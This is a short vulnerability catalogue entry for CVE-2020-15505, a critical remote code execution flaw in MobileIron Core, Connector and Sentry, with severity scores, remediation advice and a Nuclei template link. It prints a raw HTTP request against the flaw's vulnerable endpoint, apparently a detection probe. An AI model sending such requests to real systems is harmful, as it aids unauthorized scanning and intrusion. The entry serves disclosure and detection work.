| Title | MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - Remote Code Execution |
|---|---|
| Author | dwisiswant0 |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system, potentially leading to complete compromise of the MobileIron infrastructure. |
| Remediation | Upgrade MobileIron Core & Connector and Sentry to versions above v10.6 & v9.8 respectively |
| CVSS Score | 9.8 |
| EPSS Score | 0.94388 |
| CVE ID | CVE-2020-15505 |
| CWE ID | CWE-706 |
| Tags | cve cve2020 mobileiron rce sentry kev vkev vuln |
A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier contain a vulnerability that allows remote attackers to execute arbitrary code via unspecified vectors.
POST /mifs/.;/services/LogService HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.11
Content-Length: 6
Connection: close
Content-Type: x-application/hessian
Referer: https://www.victim.com
Accept-Encoding: gzip
c H
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-15505.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-15505.pcap
N/AN/A